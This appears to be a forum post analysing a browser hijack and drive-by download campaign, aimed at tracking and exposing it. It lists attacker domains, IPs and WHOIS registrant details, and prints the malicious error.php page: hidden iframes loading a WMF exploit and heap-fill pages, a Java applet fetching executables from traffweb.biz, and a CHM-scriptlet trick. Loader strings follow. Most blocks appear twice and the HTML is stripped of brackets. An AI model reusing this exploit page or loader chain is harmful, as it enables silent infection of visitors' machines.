in order of appearance :
QUOTE
.www. icoocash.com 38.113.207.59
iframe.adultfriendfinder.com 64.156.213.198
images.streamray.com 64.156.213.227
toolbarmoney.biz 85.249.23.117
traffweb.biz 85.249.23.119
iframe.adultfriendfinder.com 64.156.213.198
images.streamray.com 64.156.213.227
toolbarmoney.biz 85.249.23.117
traffweb.biz 85.249.23.119
8 domains found on traffweb.biz = 85.249.23.119
CODE
www.Traffbest.biz
.www.Traffbucks.biz
.www.Traffcool.biz
.www.Traffdollars.biz
.www.Traffmoney.biz
.www.Traffnew.biz
.www.Traffsale1.biz
.www.Traffweb.biz
.www.Traffbucks.biz
.www.Traffcool.biz
.www.Traffdollars.biz
.www.Traffmoney.biz
.www.Traffnew.biz
.www.Traffsale1.biz
.www.Traffweb.biz
QUOTE
Domain Name: TRAFFWEB.BIZ
Domain ID: D12386987-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status: clientTransferProhibited
Registrant ID: 6511608-SRSPLUS
Registrant Name: Jason Coffman
Registrant Organization: Private person
Registrant Address1: 908 Alder St
Registrant City: Philadelphia
Registrant State/Province: PA
Registrant Postal Code: 19147
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.74952171179
Registrant Email: admin@toolbarbest.biz
Domain ID: D12386987-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status: clientTransferProhibited
Registrant ID: 6511608-SRSPLUS
Registrant Name: Jason Coffman
Registrant Organization: Private person
Registrant Address1: 908 Alder St
Registrant City: Philadelphia
Registrant State/Province: PA
Registrant Postal Code: 19147
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.74952171179
Registrant Email: admin@toolbarbest.biz
toolbarbest.biz = 85.249.23.117
ns1.toolbarbest.biz = 85.249.23.115
ns2.toolbarbest.biz = 85.249.23.116
QUOTE
domains found on 85.249.23.117
www .Iframecash.biz
www .Toolbarbest.biz
www .Toolbarbucks.biz
www .Toolbarcool.biz
www .Toolbardollars.biz
www .Toolbarmoney.biz
www .Toolbarnew.biz
www .Toolbarsale.biz
www .Toolbarweb.biz
www .Iframecash.biz
www .Toolbarbest.biz
www .Toolbarbucks.biz
www .Toolbarcool.biz
www .Toolbardollars.biz
www .Toolbarmoney.biz
www .Toolbarnew.biz
www .Toolbarsale.biz
www .Toolbarweb.biz
QUOTE
Domain Name: TOOLBARBEST.BIZ
Domain ID: D11890133-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status: clientTransferProhibited
Registrant ID: 6488994-SRSPLUS
Registrant Name: Alexander Pushkin
Registrant Organization: Home Home
Registrant Address1: Pushkina str. - 1 - 1
Registrant City: Moscow
Registrant Postal Code: 123456
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +78.462788201
Registrant Email:admin@newtoolbar.biz
Domain ID: D11890133-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status: clientTransferProhibited
Registrant ID: 6488994-SRSPLUS
Registrant Name: Alexander Pushkin
Registrant Organization: Home Home
Registrant Address1: Pushkina str. - 1 - 1
Registrant City: Moscow
Registrant Postal Code: 123456
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +78.462788201
Registrant Email:admin@newtoolbar.biz
logged this a bit later while the computer was idle lol ?
QUOTE
12:35:20 AM update.firefoxupdatecenter.net New record 64.71.167.
118
12:35:21 AM ftp.icq.com New record 207.200.66.53
12:35:41 AM www.getlotto.net New record 69.57.146.81
12:36:47 AM www.viagra.com New record 63.236.70.136
12:36:51 AM www.cocaine.org New record 195.82.124.124
12:46:53 AM www.answers.com New record 208.39.44.164
118
12:35:21 AM ftp.icq.com New record 207.200.66.53
12:35:41 AM www.getlotto.net New record 69.57.146.81
12:36:47 AM www.viagra.com New record 63.236.70.136
12:36:51 AM www.cocaine.org New record 195.82.124.124
12:46:53 AM www.answers.com New record 208.39.44.164
More update.firefoxupdatecenter.net details:
http://www.short-media.com/forum/showthread.php?t=43066
-----------------------------------------------
Assorted links involved in this hijack and some others I collected on the way :
QUOTE
http://85.255.113.10/favicon.ico
http ://85.255.113.10/?to=nan99&from=in
http ://85.255.113.22/inc/nan99.html
hxxp ://85.255.113.10/?to=uncle6&from=in
hxxp ://85.255.113.22/inc/uncle6.html
hxxp ://69.50.190.131/?to=HANGMANIO&from=beli&type=beli
http ://69.50.176.174/ts/in.cgi?ad13&nisha
hxxp ://216.255.186.77/split.php?id=hangall
hxxp ://85.255.113.22/inc/thangall.html
hxxp ://toolbarmoney.biz/dl/adv645.php
hxxp ://traffweb.biz/dl/xpladv799.wmf - shite
hxxp ://traffweb.biz/dl/fillmemadv799.htm
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/java.jar
hxxp ://traffweb.biz/dl/bag.htm
hxxp ://traffweb.biz/dl/error.php - iframe loads hijack
http ://85.255.113.10/?to=nan99&from=in
http ://85.255.113.22/inc/nan99.html
hxxp ://85.255.113.10/?to=uncle6&from=in
hxxp ://85.255.113.22/inc/uncle6.html
hxxp ://69.50.190.131/?to=HANGMANIO&from=beli&type=beli
http ://69.50.176.174/ts/in.cgi?ad13&nisha
hxxp ://216.255.186.77/split.php?id=hangall
hxxp ://85.255.113.22/inc/thangall.html
hxxp ://toolbarmoney.biz/dl/adv645.php
hxxp ://traffweb.biz/dl/xpladv799.wmf - shite
hxxp ://traffweb.biz/dl/fillmemadv799.htm
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/java.jar
hxxp ://traffweb.biz/dl/bag.htm
hxxp ://traffweb.biz/dl/error.php - iframe loads hijack
error.php
QUOTE
html
body
iframe src= xpladv799.wmf width=1 height=1 iframe
applet archive="java.jar" code=" GetAccess.class " width=1 height=1
param name="ModulePath"
value="hxxp:// traffweb.biz/dl/loaderadv799_2.exe
applet>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe
iframe width=1 height=1 border=0 frameborder=0
src=fillmemadv799.htm iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe>
iframe width=1 height=1 border=0 frameborder=0 src=bag.htm
iframe
applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter
APPLET
SCRIPT LANGUAGE=JavaScript
obj = object data= \ ms-its : mhtml:file
obj1 = :// C: \\ nosuch.mht ! hxxp:// traffweb.biz/dl/adv799/ x. chm :: / x. htm \ type= \ text/x-scriptlet\
object
document.write(obj+obj1)
script
body
html
body
iframe src= xpladv799.wmf width=1 height=1 iframe
applet archive="java.jar" code=" GetAccess.class " width=1 height=1
param name="ModulePath"
value="hxxp:// traffweb.biz/dl/loaderadv799_2.exe
applet>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe
iframe width=1 height=1 border=0 frameborder=0
src=fillmemadv799.htm iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe>
iframe width=1 height=1 border=0 frameborder=0 src=bag.htm
iframe
applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter
APPLET
SCRIPT LANGUAGE=JavaScript
obj = object data= \ ms-its : mhtml:file
obj1 = :// C: \\ nosuch.mht ! hxxp:// traffweb.biz/dl/adv799/ x. chm :: / x. htm \ type= \ text/x-scriptlet\
object
document.write(obj+obj1)
script
body
html
inside loaderadv799.jar is matrix.class containing:
QUOTE
java/net/URL hxxp://traffweb.biz/dl/loaderadv799_4.exe
\loadnew.exe java/lang/String hxxp://traffweb.biz/dl/cheat.php?adv=adv799
\loadnew.exe java/lang/String hxxp://traffweb.biz/dl/cheat.php?adv=adv799
hxxp ://traffweb.biz/dl/loaderadv799_4.exe
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799
Loadnew.exe hxxp ://traffweb.biz/progs/secure32.php
Loadnew.exe hxxp ://traffweb.biz/progs/paytime.txt
Loadnew.exe hxxp ://traffweb.biz/progs/toolbar.txt
Loadnew.exe hxxp ://traffweb.biz/progs/tool1.txt
--
hxxp://traffweb.biz/progs/toolbar.txt = toolbar.exe
code inside toolbar.exe contains :
QUOTE
C l i c k h e r e t o a g r e e t h i s d o w n l o a d . . .?0
?.hxxp://eula.dollarrevenue.com/eula.asp?id=103 0
?.hxxp://eula.dollarrevenue.com/eula.asp?id=103 0
-----
hxxp ://traffweb.biz/progs/paytime.txt = paytime.exe
TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack\march\\trafficbiz\\paytime.rar/paytime.exe (StartPage.148)
QUOTE
C o m p a n y N a m e M i c r o s o f t C o r p o r a t i o n : F i l e D e s c r i p t i o n e x p l o r e r 6
F i l e V e r s i o n 2 , 5 , 1 , 1 6 0 0 2 I n t e r n a l N m e e x p l o r e r p & L e g a l C o p y r i g h t C o p y r i g h t M i c r o s o f t C o r p o r a t i o n ? 2 0 0 5 ( L e g a l T r a d e m a r k s B O r i g i n a l F i l e n a m e e x p l o r e r . e x e P r i v a t e B u i l d @ P r o d u c t N a m e e x p l o r e r h e l p e r :
F i l e V e r s i o n 2 , 5 , 1 , 1 6 0 0 2 I n t e r n a l N m e e x p l o r e r p & L e g a l C o p y r i g h t C o p y r i g h t M i c r o s o f t C o r p o r a t i o n ? 2 0 0 5 ( L e g a l T r a d e m a r k s B O r i g i n a l F i l e n a m e e x p l o r e r . e x e P r i v a t e B u i l d @ P r o d u c t N a m e e x p l o r e r h e l p e r :
-----
-
hxxp://traffweb.biz/progs/secure32.php - desktop wallpaper hijack
TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack march\\trafficbiz\\secure32.html (Harnig.103)

--
hxxp://traffweb.biz/favicon.ico
hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp://traffweb.biz/progs/tool2.txt - tool2.exe
hxxp://traffweb.biz/progs/tool3.txt - tool3.exe

hxxp://traffweb.biz/progs/country.php - country.htm / country.exe
-
Loadnew.exe runs hxxp://traffweb.biz/progs/tool2.txt
TDS-3 Positive identification: TrojanDropper.Win32.Small.abm
File:c:\documentsandsettings\spywarekiller\desktop\hijack\march\trafficbiz\loadnew.exe
loadnew.exe
loaderadv799.jar
kl1.exe
uniq
----
More info here:
http://www.bleedingsnort.com/forum/viewtop...&showtopic=1671
Great analysis here :
http://www.wilderssecurity.com/showthread.php?p=693007
back soon with full scans , logs and yes pictures too.
--